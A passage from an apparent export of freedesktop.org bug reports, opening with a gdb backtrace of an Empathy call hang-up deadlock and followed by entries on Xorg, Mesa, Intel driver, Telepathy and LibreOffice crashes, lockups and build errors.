#3  0x00007ff56ebccfb9 in pa_mainloop_iterate () from /usr/lib/libpulse.so.0
#4  0x00007ff56ebcd070 in pa_mainloop_run () from /usr/lib/libpulse.so.0
#5  0x00007ff56ebdbbcb in ?? () from /usr/lib/libpulse.so.0
#6  0x00007ff56e998d48 in ?? () from /usr/lib/libpulsecommon-0.9.22.so
#7  0x00007ff5879b9b40 in start_thread (arg=) at pthread_create.c:304
#8  0x00007ff582ace28d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:112
#9  0x0000000000000000 in ?? ()
Thread 4 (Thread 0x7ff56c7b4700 (LWP 4024)):
#0  pthread_cond_wait@@GLIBC_2.3.2 () at ../nptl/sysdeps/unix/sysv/linux/x86_64/pthread_cond_wait.S:140
#1  0x00007ff56ebdb6b0 in pa_threaded_mainloop_wait () from /usr/lib/libpulse.so.0
#2  0x00007ff56edffdaa in gst_pulsesrc_read (asrc=0x1ca80c0 data=0x7ff567ded4d0 length=) at pulsesrc.c:759
#3  0x00007ff578c9d4c8 in audioringbuffer_thread_func (buf=0x1d50190) at gstaudiosrc.c:231
#4  0x00007ff582de8cf6 in g_thread_create_proxy (data=0x21aa990) at /tmp/buildd/glib2.0-2.28.6/./glib/gthread.c:1897
#5  0x00007ff5879b9b40 in start_thread (arg=) at pthread_create.c:304
#6  0x00007ff582ace28d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:112
#7  0x0000000000000000 in ?? ()
Thread 3 (Thread 0x7ff567bb2700 (LWP 4025)):
#0  pthread_cond_wait@@GLIBC_2.3.2 () at ../nptl/sysdeps/unix/sysv/linux/x86_64/pthread_cond_wait.S:162
#1  0x00007ff578c8ef89 in wait_segment (buf=0x1d50190) at gstringbuffer.c:1478
#2  0x00007ff578c9066c in gst_ring_buffer_read (buf=0x1d50190 sample=3960000 
    data=0x2257510 N\001\247\273N\001\247\273J\001\245\273J\001\245\273f\001\263\273f\001\263\273v\001\274v\001\274 \001\020\274 \001\020\274\224\001Ê»\224\001Ê»Q\201(\274Q\201(\274\200\001@\200\001@\310\001d\274\310\001d\274'\201\023\274'\201\023\274\064\001\032\273\064\001\032\273C\201!\274C\201!\274p\001\270\273p\001\270\273\250\001\324:\250\001\324:@\001\240\071@\001\240\071i\201\064\274i\201\064\274\310\001\344\310\001\344L\001\246L\001\246\020\001\210\272\020\001\210\272d\001\062d\001\062J\001%&lt;J\001%&lt;4\001\2324\001\232\200\001@\200\001@o\201\067&lt;o\201\067&lt;!\201\220&lt;!\201\220&lt;... len=440)
---Type  to continue or q  to quit---
    at gstringbuffer.c:1893
#3  0x00007ff578c992ef in gst_base_audio_src_create (bsrc=0x1ca80c0 offset= length= outbuf=0x7ff567bb1b08)
    at gstbaseaudiosrc.c:810
#4  0x00007ff58b9ad73f in gst_base_src_get_range (src=0x1ca80c0 offset=18446744073709551615 length=0 buf=0x7ff567bb1b08) at gstbasesrc.c:2145
#5  0x00007ff58b9aeb93 in gst_base_src_loop (pad=0x2178010) at gstbasesrc.c:2402
#6  0x00007ff58898f570 in gst_task_func (task=0x1da9560) at gsttask.c:318
#7  0x00007ff582deb3e4 in g_thread_pool_thread_proxy (data=) at /tmp/buildd/glib2.0-2.28.6/./glib/gthreadpool.c:319
#8  0x00007ff582de8cf6 in g_thread_create_proxy (data=0x1cad6a0) at /tmp/buildd/glib2.0-2.28.6/./glib/gthread.c:1897
#9  0x00007ff5879b9b40 in start_thread (arg=) at pthread_create.c:304
#10 0x00007ff582ace28d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:112
#11 0x0000000000000000 in ?? ()
Thread 2 (Thread 0x7ff566d5e700 (LWP 4026)):
#0  0x00007ff582ac3731 in ppoll (fds= nfds= timeout= sigmask=)
    at ../sysdeps/unix/sysv/linux/ppoll.c:57
#1  0x00007ff588975305 in gst_poll_wait (set=0x1f41630 timeout=18446744073709551615) at gstpoll.c:1276
#2  0x00007ff566da4c79 in ?? () from /usr/lib/gstreamer-0.10/libgstshm.so
#3  0x00007ff582de8cf6 in g_thread_create_proxy (data=0x21ce840) at /tmp/buildd/glib2.0-2.28.6/./glib/gthread.c:1897
#4  0x00007ff5879b9b40 in start_thread (arg=) at pthread_create.c:304
#5  0x00007ff582ace28d in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:112
#6  0x0000000000000000 in ?? ()
Thread 1 (Thread 0x7ff58bfbf980 (LWP 4017)):
#0  __lll_lock_wait () at ../nptl/sysdeps/unix/sysv/linux/x86_64/lowlevellock.S:136
#1  0x00007ff5879bc329 in _L_lock_926 () from /lib/libpthread.so.0
#2  0x00007ff5879bc14b in __pthread_mutex_lock (mutex=0x2009e40) at pthread_mutex_lock.c:61
#3  0x00007ff58b76cb00 in src_pad_added (fsstream=0x1d4fd50 pad=0x1dd6c40 codec=0x1f35f20 content=0x1f0e050) at call-content.c:1172
#4  0x00007ff58368be7e in g_closure_invoke (closure=0x21c4d70 return_value=0x0 n_param_values=3 param_values=0x1f41770 invocation_hint=0x7fffcd7fd2f0)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
#5  0x00007ff58369d8d7 in signal_emit_unlocked_R (node= detail=0 instance=0x1d4fd50 emission_return=0x0 
    instance_and_params=0x1f41770) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3252
#6  0x00007ff5836a6d05 in g_signal_emit_valist (instance= signal_id= detail= 
    var_args=) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2983
#7  0x00007ff5836a6ed3 in g_signal_emit (instance= signal_id= detail=)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3040
#8  0x00007ff56f843db9 in _transmitter_pad_have_data_callback (pad= buffer= user_data=)
    at /tmp/buildd/farsight2-0.0.28/./gst/fsrawconference/fs-raw-session.c:1349
#9  0x00007ff5889a79c8 in gst_marshal_BOOLEAN__POINTER (closure=0x21c4290 return_value=0x7fffcd7fd7e0 n_param_values= 
    param_values=0x7fffcd7fd908 invocation_hint= marshal_data=) at gstmarshal.c:586
#10 0x00007ff58368be7e in g_closure_invoke (closure=0x21c4290 return_value=0x7fffcd7fd7e0 n_param_values=2 param_values=0x7fffcd7fd908 
    invocation_hint=0x7fffcd7fd7a0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
#11 0x00007ff58369d8d7 in signal_emit_unlocked_R (node= detail=190 instance=0x2174540 emission_return=0x7fffcd7fd938 
    instance_and_params=0x7fffcd7fd908) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3252
---Type  to continue or q  to quit---
#12 0x00007ff5836a62c7 in g_signal_emitv (instance_and_params= signal_id= detail=190 return_value=0x7fffcd7fd938)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2888
#13 0x00007ff58892f63b in gst_pad_emit_have_data_signal (pad= obj=0x21ca740) at gstpad.c:4143
#14 0x00007ff58896a0db in gst_pad_push_event (pad=0x2174540 event=0x21ca740) at gstpad.c:5236
#15 0x00007ff588953741 in gst_proxy_pad_do_event (pad= event=0x21ca740) at gstghostpad.c:114
#16 0x00007ff588969c82 in gst_pad_send_event (pad=0x1f14890 event=0x21ca740) at gstpad.c:5398
#17 0x00007ff58896a203 in gst_pad_push_event (pad=0x2178190 event=0x21ca740) at gstpad.c:5250
#18 0x00007ff566faa743 in fs_funnel_event (pad= event=0x21ca740) at /tmp/buildd/farsight2-0.0.28/./gst/funnel/fs-funnel.c:333
#19 0x00007ff588969c82 in gst_pad_send_event (pad=0x21c8ca0 event=0x21ca740) at gstpad.c:5398
#20 0x00007ff58896a203 in gst_pad_push_event (pad=0x21c8b20 event=0x21ca740) at gstpad.c:5250
#21 0x00007ff58b9af5d6 in gst_base_src_change_state (element=0x21d2180 transition=) at gstbasesrc.c:3125
#22 0x00007ff566da3f6f in ?? () from /usr/lib/gstreamer-0.10/libgstshm.so
#23 0x00007ff58894ca5c in gst_element_change_state (element=0x21d2180 transition=) at gstelement.c:2718
#24 0x00007ff58894cd1b in gst_element_change_state (element=0x21d2180 transition=) at gstelement.c:2762
#25 0x00007ff58894d442 in gst_element_set_state_func (element=0x21d2180 state=GST_STATE_NULL) at gstelement.c:2674
#26 0x00007ff5671aee49 in fs_shm_transmitter_check_shm_src (self=0x1ff4c80 shm=0x21ca780 path=)
    at /tmp/buildd/farsight2-0.0.28/./transmitters/shm/fs-shm-transmitter.c:641
#27 0x00007ff5671afaf4 in fs_shm_stream_transmitter_dispose (object=0x1fd9020)
    at /tmp/buildd/farsight2-0.0.28/./transmitters/shm/fs-shm-stream-transmitter.c:258
#28 0x00007ff58368d1ca in g_object_unref (_object=0x1fd9020) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
#29 0x00007ff56f846bdf in fs_raw_stream_real_dispose (object=) at /tmp/buildd/farsight2-0.0.28/./gst/fsrawconference/fs-raw-stream.c:316
#30 fs_raw_stream_dispose (object=) at /tmp/buildd/farsight2-0.0.28/./gst/fsrawconference/fs-raw-stream.c:368
#31 0x00007ff58368d1ca in g_object_unref (_object=0x1d4fd50) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
#32 0x00007ff58b76a666 in free_content_fsstream (data=0x1f502c0) at call-content.c:193
#33 0x00007ff582d96045 in g_ptr_array_remove_index_fast (farray= index_=0) at /tmp/buildd/glib2.0-2.28.6/./glib/garray.c:1077
#34 0x00007ff58b76ca5c in _tf_call_content_put_fsstream (content=0x1f0e050 fsstream=0x1d4fd50) at call-content.c:1151
#35 0x00007ff58b76cf26 in tf_call_stream_dispose (object=0x1ff4be0) at call-stream.c:85
#36 0x00007ff58368d1ca in g_object_unref (_object=0x1ff4be0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
#37 0x00007ff582db004e in g_hash_table_remove_all_nodes (hash_table=0x1f31f70 notify=1) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:492
#38 0x00007ff582db093d in g_hash_table_remove_all (hash_table=0x1f31f70) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:1171
#39 0x00007ff582db09d5 in g_hash_table_destroy (hash_table=0x1f31f70) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:877
#40 0x00007ff58b76a72d in tf_call_content_dispose (object=0x1f0e050) at call-content.c:214
#41 0x00007ff58368d1ca in g_object_unref (_object=0x1f0e050) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
#42 0x00007ff582db004e in g_hash_table_remove_all_nodes (hash_table=0x1f320f0 notify=1) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:492
#43 0x00007ff582db093d in g_hash_table_remove_all (hash_table=0x1f320f0) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:1171
#44 0x00007ff582db09d5 in g_hash_table_destroy (hash_table=0x1f320f0) at /tmp/buildd/glib2.0-2.28.6/./glib/ghash.c:877
#45 0x00007ff58b76938a in tf_call_channel_dispose (object=0x1feb280) at call-channel.c:235
#46 0x00007ff58368d1ca in g_object_unref (_object=0x1feb280) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
#47 0x00007ff58b766eca in tf_channel_dispose (object=0x1f32000) at channel.c:347
#48 0x00007ff58368d1ca in g_object_unref (_object=0x1f32000) at /tmp/buildd/glib2.0-2.28.6/./gobject/gobject.c:2697
#49 0x0000000000426cb4 in empathy_call_window_hangup_cb (object= window=0x1d720c0) at empathy-call-window.c:3096
#50 0x00007ff58368be7e in g_closure_invoke (closure=0x1d9e340 return_value=0x0 n_param_values=1 param_values=0x1f476e0 invocation_hint=0x7fffcd7fe210)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
---Type  to continue or q  to quit---
#51 0x00007ff58369d8d7 in signal_emit_unlocked_R (node= detail=0 instance=0x1d4f6f0 emission_return=0x0 
    instance_and_params=0x1f476e0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3252
#52 0x00007ff5836a6d05 in g_signal_emit_valist (instance= signal_id= detail= 
    var_args=) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2983
#53 0x00007ff5836a7092 in g_signal_emit_by_name (instance= detailed_signal=0x7ff5858e8143 clicked)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3077
#54 0x00007ff58368be7e in g_closure_invoke (closure=0x1dab560 return_value=0x0 n_param_values=1 param_values=0x1f52ca0 invocation_hint=0x7fffcd7fe6b0)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
#55 0x00007ff58369d8d7 in signal_emit_unlocked_R (node= detail=0 instance=0x1da6180 emission_return=0x0 
    instance_and_params=0x1f52ca0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3252
#56 0x00007ff5836a6d05 in g_signal_emit_valist (instance= signal_id= detail= 
    var_args=) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2983
#57 0x00007ff5836a6ed3 in g_signal_emit (instance= signal_id= detail=)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3040
#58 0x00007ff58568dec5 in gtk_real_button_released (button=0x1da6180) at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkbutton.c:1725
#59 0x00007ff58368be7e in g_closure_invoke (closure=0x1cf4d10 return_value=0x0 n_param_values=1 param_values=0x1f49aa0 invocation_hint=0x7fffcd7feae0)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
#60 0x00007ff58369d09c in signal_emit_unlocked_R (node= detail=0 instance=0x1da6180 emission_return=0x0 
    instance_and_params=0x1f49aa0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3182
#61 0x00007ff5836a6d05 in g_signal_emit_valist (instance= signal_id= detail= 
    var_args=) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2983
#62 0x00007ff5836a6ed3 in g_signal_emit (instance= signal_id= detail=)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3040
#63 0x00007ff58568cc7d in gtk_button_button_release (widget= event=)
    at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkbutton.c:1617
#64 0x00007ff585737d48 in _gtk_marshal_BOOLEAN__BOXED (closure=0x1ce0580 return_value=0x7fffcd7fef80 n_param_values= 
    param_values=0x1c9b0a0 invocation_hint= marshal_data=)
    at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkmarshalers.c:86
#65 0x00007ff58368be7e in g_closure_invoke (closure=0x1ce0580 return_value=0x7fffcd7fef80 n_param_values=2 param_values=0x1c9b0a0 
    invocation_hint=0x7fffcd7fef40) at /tmp/buildd/glib2.0-2.28.6/./gobject/gclosure.c:767
#66 0x00007ff58369d6e8 in signal_emit_unlocked_R (node= detail=0 instance=0x1da6180 emission_return=0x7fffcd7ff0f0 
    instance_and_params=0x1c9b0a0) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3290
#67 0x00007ff5836a6aa5 in g_signal_emit_valist (instance= signal_id= detail= 
    var_args=) at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:2993
#68 0x00007ff5836a6ed3 in g_signal_emit (instance= signal_id= detail=)
    at /tmp/buildd/glib2.0-2.28.6/./gobject/gsignal.c:3040
#69 0x00007ff585853d8f in gtk_widget_event_internal (widget=0x1da6180 event=0x21d05d0) at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkwidget.c:4980
#70 0x00007ff585735f03 in IA__gtk_propagate_event (widget=0x1da6180 event=0x21d05d0) at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkmain.c:2489
#71 0x00007ff5857362b3 in IA__gtk_main_do_event (event=0x21d05d0) at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkmain.c:1684
#72 0x00007ff585138b7c in gdk_event_dispatch (source= callback= user_data=)
    at /scratch/build-area/gtk+2.0-2.24.4/gdk/x11/gdkevents-x11.c:2377
#73 0x00007ff582dc14a3 in g_main_dispatch (context=0x1cc06d0) at /tmp/buildd/glib2.0-2.28.6/./glib/gmain.c:2440
#74 g_main_context_dispatch (context=0x1cc06d0) at /tmp/buildd/glib2.0-2.28.6/./glib/gmain.c:3013
---Type  to continue or q  to quit---
#75 0x00007ff582dc1c80 in g_main_context_iterate (context=0x1cc06d0 block=1 dispatch=1 self=)
    at /tmp/buildd/glib2.0-2.28.6/./glib/gmain.c:3091
#76 0x00007ff582dc22f2 in g_main_loop_run (loop=0x1d25270) at /tmp/buildd/glib2.0-2.28.6/./glib/gmain.c:3299
#77 0x00007ff5857352b7 in IA__gtk_main () at /scratch/build-area/gtk+2.0-2.24.4/gtk/gtkmain.c:1256
#78 0x000000000041e991 in main (argc=1 argv=0x7fffcd7ff5f8) at empathy-call.c:186
(gdb)</t>
  </si>
  <si>
    <t>LIBREOFFICE-70157</t>
  </si>
  <si>
    <t>FILEOPEN: abort on .docx file opening</t>
  </si>
  <si>
    <t>Created attachment 87146
This file will cause Writer 4.1.1.2 on OS/X to abend when opened
Problem description: 
Writer Abends when opening a docx file
Steps to reproduce:
1. .... Writer File Open SemesterProject.docx
2. ....
3. ....
Current behavior:
Writer Abends when opening a docx file
Expected behavior:
File should open. 
I will try to upload the file and the stack trace. 
Operating System: Mac OS X
Version: 4.1.1.2 release</t>
  </si>
  <si>
    <t>dwcombs</t>
  </si>
  <si>
    <t>DRI-104021</t>
  </si>
  <si>
    <t>[IGT] kms_fbcon_fbt subtest psr-suspend failed with assertion: ret == 0 / rtcwake failed with 1</t>
  </si>
  <si>
    <t>Created attachment 135860
otuput</t>
  </si>
  <si>
    <t>DRI-91438</t>
  </si>
  <si>
    <t>hard lockup after switching between laptop's panel and external monitor</t>
  </si>
  <si>
    <t>Created attachment 117314
relevant dmesg and laptop info
When docking my laptop I usually use xrandr to turn off the laptop's display so that my taskbar and network applets are displayed properly on my external monitor.
When trying to debug some unrelated stuff I found out that I could hard lock the laptop after switching back and forth a few times between both monitors.
It took quite a bit of time to reproduce the problem. It happens only when the laptop is docked.
How to reproduce:
- laptop docked external monitor on VGA port (no dongle)
- the following steps trigger a hard lockup:
# try1
xrandr --output $PANEL --off
xrandr --output $EXT --auto
xrandr --output $PANEL --auto
xrandr --output $EXT --off
# try2
xrandr --output $PANEL --off
xrandr --output $EXT --auto # the external panel stays blank
xrandr --output $PANEL --auto # locks a bit after here
xrandr --output $EXT --off
note that the blocks are identical - ie there's no problem the first time but running the same commands a second time trigger the lockup. Both displays are black/blank so there's no way to even see what's happening.
The xrandrvga script in the attached tgz outputs dmesg + xrandr --verbose after each switch. The debug files show that the output of xrandr --verbose after setting the panel to auto in the 2nd try is 0. So I'm not sure if it's because of running xrandr or because the next command (turning off the external panel) triggers the hard lockup and the output file is not flushed to disk.
note:
- when docked the external monitor shows up as DP2-3 and it's DP2 when undocked (= plugged in the laptop's VGA port).
- enable_psr=0 enable_fbc=0
Hardware: lenovo T450s model 20BX000TBM (see attached dmidecode and lspci_vv).
OS: Fedora 22 fully updated (as of 2015-07-23)
Kernel: git drm-intel-nightly (as of 2015-07-22 evening). .config attached (config.drm-intel).
Xorg:
- xorg-x11-server-Xorg-1.17.2-1.fc22.x86_64
- xorg-x11-drv-intel-2.99.917-12.20150615.fc22.x86_64
- mesa-dri-drivers-10.6.1-1.20150629.fc22.x86_64
attached a tgz with the relevant files
- docked: tests with the laptop docked (lockup)
- undocked_on_AC: tests with the laptop undocked on AC with the external monitor plugged in the laptop's VGA port. (in that case everything is working fine).</t>
  </si>
  <si>
    <t>ivan.mitev</t>
  </si>
  <si>
    <t>DRI-111407</t>
  </si>
  <si>
    <t>[CI][BAT] igt@kms_chamelium@(dp|hdmi)-hpd-fast - Invalid connector status after hotplug: got connected expected disconnected</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/tree/drm-tip/IGT_5137/fi-cml-u2/igt@kms_chamelium@dp-hpd-fast.html
https://intel-gfx-ci.01.org/tree/drm-tip/IGT_5137/fi-icl-u2/igt@kms_chamelium@dp-hpd-fast.html
https://intel-gfx-ci.01.org/tree/drm-tip/IGT_5137/fi-icl-u2/igt@kms_chamelium@hdmi-hpd-fast.html
https://intel-gfx-ci.01.org/tree/drm-tip/IGT_5137/fi-skl-6700k2/igt@kms_chamelium@hdmi-hpd-fast.html
Starting subtest: dp-hpd-fast
(kms_chamelium:2771) CRITICAL: Test assertion failure function test_basic_hotplug file ../tests/kms_chamelium.c:275:
(kms_chamelium:2771) CRITICAL: Failed assertion: status == DRM_MODE_DISCONNECTED
(kms_chamelium:2771) CRITICAL: Invalid connector status after hotplug: got connected expected disconnected
Subtest dp-hpd-fast failed.</t>
  </si>
  <si>
    <t>TELEPATHY-26928</t>
  </si>
  <si>
    <t>Request's CreateChannel not returning all properties causes random failures on Maemo 5</t>
  </si>
  <si>
    <t>I guess I should be using the bugzilla.  This is taken from a post on the telepathy mailing list.
http://lists.freedesktop.org/archives/telepathy/2010-March/004282.html
After much help from Lassi SyrjÃ¤lÃ¤ of Nokia I've been able to narrow
down an issue I was having with my connection Manager on the Maemo 5.
I got random reports of Maemo's phone UI reporting General Error.
Monitoring DBus showed that this came from Maemo 5's Mission Control
randomly passing incomplete information to the UI particularly the
InitiatorHandle was lacking.
What happens is Mission Control calls HandleChannels sometime after
CreateChannel with whatever information it has at the moment.
telepathy-python's implementation of the Requests interface only
returns the properties it was given minus the mutable ones.  This
does not include the InitiatorHandle.  Mission Control starts some
other queries for information on the channel.  If those don't return
with the InitiatorHandle before HandleChannels is called then we see
the error.
My patch is to have CreateChannel/EnsureChannel return the properties
from the channel (much like NewChannels does) rather than uselessly
returning the properties passed in.  I've done some basic testing and
have reports of one or two other people testing this.  Sadly with race
conditions its hard to prove they are fixed by the lack of them.
Github page for the branch containing the fix
http://github.com/epage/telepathy-python/tree/tor-fixes
The change
http://github.com/epage/telepathy-python/commit/d86238e21e4f19080de7273e8b7d809069c9ccce
Git repo
http://github.com/epage/telepathy-python.git
The The One Ring bug report that has the investigation on this:
https://bugs.maemo.org/show_bug.cgi?id=8980</t>
  </si>
  <si>
    <t>eopage</t>
  </si>
  <si>
    <t>MESA-103002</t>
  </si>
  <si>
    <t>string_buffer_test.cpp:43: error: ISO C++ forbids initialization of member â€˜str1â€™</t>
  </si>
  <si>
    <t>mesa: 8822ea100cfd7482290c3c6b2a7200c8b888a7f4 (master 17.3.0-devel)
Build error with g++ 4.4.
  CXX    string_buffer_test.o
string_buffer_test.cpp:43: error: ISO C++ forbids initialization of member â€˜str1â€™
string_buffer_test.cpp:43: error: making â€˜str1â€™ static
string_buffer_test.cpp:43: error: invalid in-class initialization of static data member of non-integral type â€˜const char*â€™
Introduced with this commit.
commit 584a2a22ea40cdc030db5b1d70b23dddcc06a556
Author: Thomas Helland 
Date:   Fri May 19 22:07:17 2017 +0200
    util: Add tests for the string buffer
    More tests could probably be added but this should cover
    concatenation resizing clearing formatted printing
    and checking the length so it should be quite complete.
    Signed-off-by: Thomas Helland 
    Reviewed-by: Nicolai HÃ¤hnle 
    Tested-by: Dieter NÃ¼tzel 
    V2: Address review feedback from Timothy plus fixes
       - Use a large enough char array
       - Actually test the formatted appending
       - Test that clear function resets string length
    V3: Port to gtest
    V4: Fix test makefile
        Fix copyright header
        Fix missing extern C
        Use more appropriate name for C-file
        Add tests for append_char</t>
  </si>
  <si>
    <t>XORG-323</t>
  </si>
  <si>
    <t>Middle button mouse scrolling (Mathias FrÃ¶hlich)</t>
  </si>
  <si>
    <t>Middle button mouse scrolling (Mathias FrÃ¶hlich)
http://www.mail-archive.com/devel@xfree86.org/msg03333.html</t>
  </si>
  <si>
    <t>XORG-18664</t>
  </si>
  <si>
    <t>X700 locks up from time to time</t>
  </si>
  <si>
    <t>Created attachment 20512
log with infinite loop backtrace
(I am not sure where to file this but I guess it is radeon specific)
Xorg locks up from time to time. Typically once an hour when using compiz and firefox rather quickly when using googleearth and for instance zooming in to a placemark by double clicking on it in the left pane list - maybe also mouse movements just after helps trigger it.
I am using Ubuntu 8.10 with these upgrades:
- drm modules and libdrm from git master
- mesa from git mesa_7_2_branch
- xserver from git server-1.5-branch
- radeon from git master
Default xorg.conf (no options) XAA.
01:00.0 VGA compatible controller [0300]: ATI Technologies Inc Radeon Mobility X700 (PCIE) [1002:5653]</t>
  </si>
  <si>
    <t>XORG-54942</t>
  </si>
  <si>
    <t>xf86-video-intel configure.ac automagics on libudev  should be controllable</t>
  </si>
  <si>
    <t>Created attachment 67185
patch to add a --disable-udev option to ./configure
Building an xf86-video-intel binary using a system that has udev installed but for a target where udev will not be used is currently difficult and unsupported in configure.ac.
Addition of an AC_ARG_ENABLE to optionally turn off the configure check would make this much simpler.
Please see the provided patch.
Reference:  https://bugs.gentoo.org/show_bug.cgi?id=434794
Affected versions:  all since 2.14.0  looks like.</t>
  </si>
  <si>
    <t>axs</t>
  </si>
  <si>
    <t>XORG-20118</t>
  </si>
  <si>
    <t>xf86-video-intel-2.6.0 tarball doesn't build on Debian lenny</t>
  </si>
  <si>
    <t>Hi all --
I have a Sony Vaio PCG-R505ECX with the Intel 82830 CGC video system which I have recently upgraded to Debian lenny and was having some strange video corruption issues.
As a sanity check on the hardware I wanted to try a different video driver for the same chipset and soon found my way to the driver at http://www.intellinuxgraphics.com whose latest stable release is the xf86-video-intel-2.6.0.tar.bz2 download.
This file would initially not configure due to a requirement for libdrm version 2.4.4 but the same page provides the tarball for this version of the library and it built fine on my system using ./configure --prefix=/usr/local make make install.
Subsequent to this the xf86-video-intel-2.6.0 tarball would then configure but it would not build.  The makefile gets an error attempting to build i830_lvds.c.  The error starting from the build line for the problem file is:
&gt; ../doltcompile gcc -DHAVE_CONFIG_H -I. -I..   -I/usr/include/xorg -I/usr/include/pixman-1    -I/usr/local/stow/libdrm-2.4.4/include -I/usr/local/stow/libdrm-2.4.4/include/drm   -Wall -Wpointer-arith -Wstrict-prototypes      -Wmissing-prototypes -Wmissing-declarations     -Wnested-externs -fno-strict-aliasing -I/usr/include/xorg -I/usr/include/pixman-1   -I/usr/local/stow/libdrm-2.4.4/include -I/usr/local/stow/libdrm-2.4.4/include/drm   -I/usr/include/X11/dri -I../uxa -DI830_XV -DI830_USE_XAA -DI830_USE_EXA -g -O2 -MT i830_lvds.lo -MD -MP -MF .deps/i830_lvds.Tpo -c -o i830_lvds.lo i830_lvds.c
&gt; i830_lvds.c: In function â€˜i830_lvds_get_modesâ€™:
&gt; i830_lvds.c:827: error: â€˜DS_VENDORâ€™ undeclared (first use in this function)
&gt; i830_lvds.c:827: error: (Each undeclared identifier is reported only once
&gt; i830_lvds.c:827: error: for each function it appears in.)
&gt; make[4]: *** [i830_lvds.lo] Error 1
&gt; make[4]: Leaving directory `/home/reid/download/intel/xf86-video-intel-2.6.0/src'
&gt; make[3]: *** [all-recursive] Error 1
&gt; make[3]: Leaving directory `/home/reid/download/intel/xf86-video-intel-2.6.0/src'
&gt; make[2]: *** [all] Error 2
&gt; make[2]: Leaving directory `/home/reid/download/intel/xf86-video-intel-2.6.0/src'
&gt; make[1]: *** [all-recursive] Error 1
&gt; make[1]: Leaving directory `/home/reid/download/intel/xf86-video-intel-2.6.0'
&gt; make: *** [all] Error 2
  Debian lenny has version 7.1 of the X.org server and provides the associated header files and so forth in a -dev package.
  Is this just too old of an X.org installation to build this driver?  If so can you point me to an older version of the driver?  The chipset in question is rather old so I don't imagine there's a real requirement for new software but I was unable to find any archives of previous xf86-video-intel tarballs which might work.</t>
  </si>
  <si>
    <t>reidac</t>
  </si>
  <si>
    <t>XORG-7567</t>
  </si>
  <si>
    <t>Driver/fbdev</t>
  </si>
  <si>
    <t>Xorg 7.0.0 fbdev + radeonfb == blank screen on Alpha</t>
  </si>
  <si>
    <t>Overview Description:
Running the X server with fbdev configured in xorg.conf results in a blank
screen.  The Linux framebuffer driver being used is radeonfb.
Steps to Reproduce:
(1) Configure kernel with radeonfb as a built-in.
(2) Boot at any resolution supported by card+display.  In my case I've tried
both the default 640x480-8 resolution and 1024x768-16@70 (max. refresh rate my
monitor will support).
(3) Allow gdm to start via init scripts or login and run startx manually.
Actual Results:
Display switched to vt7 (first unused virtual terminal) went blank and then
did nothing further.
Expected Results:
Login screen for gdm case gnome desktop for startx case.
Build Date and Platform:
16 March 2006 on DEC PWS 433au (Alpha -- Miata) running Linux 2.6.18-rc[1-2] 
Additional Information:
System will boot successfully with radeonfb driver configured as a built-in.
When gdm starts the X server the display switches to vt7 blanks and then...
nothing.  System is still fully functional otherwise i.e. I can switch virtual
consoles with ctrl+alt+f1 and the console display is restored properly.  There's
no lock-up/freeze nor any Oops message.  Disabling gdm and running startx
manually results in the same behavior.
Attachments (xorg.conf Xorg.0.log) to follow if I can figure out how to add
them.  (I'm guessing enter_bug.cgi will prompt for them when I commit???)</t>
  </si>
  <si>
    <t>rct</t>
  </si>
  <si>
    <t>XORG-6026</t>
  </si>
  <si>
    <t>XDM: Segfault in netaddr.c:ConvertAddr</t>
  </si>
  <si>
    <t>It is possible for the ifa_addr field of an ifaddrs struct to be NULL (for
example in the case that the ifaddrs struct corresponds to a pppX interface).
This causes a segfault in the child process forked by session.c:StartClient. The
result is that after a user attempts to login the screen goes black and then
goes back to the XDM login screen because the segfault only takes down the child
process that would have started the user's session.
Below is a patch against xdm-X11R7.0-1.0.1 to fix the segfault.
diff -Naur xdm-X11R7.0-1.0.1/netaddr.c xdm-X11R7.0-1.0.1-edit/netaddr.c
--- xdm-X11R7.0-1.0.1/netaddr.c 2004-04-23 15:54:42.000000000 -0400
+++ xdm-X11R7.0-1.0.1-edit/netaddr.c    2006-02-24 00:45:00.000000000 -0500
@@ -1557 +1557 @@
 {
     int retval
-    if (len == NULL)
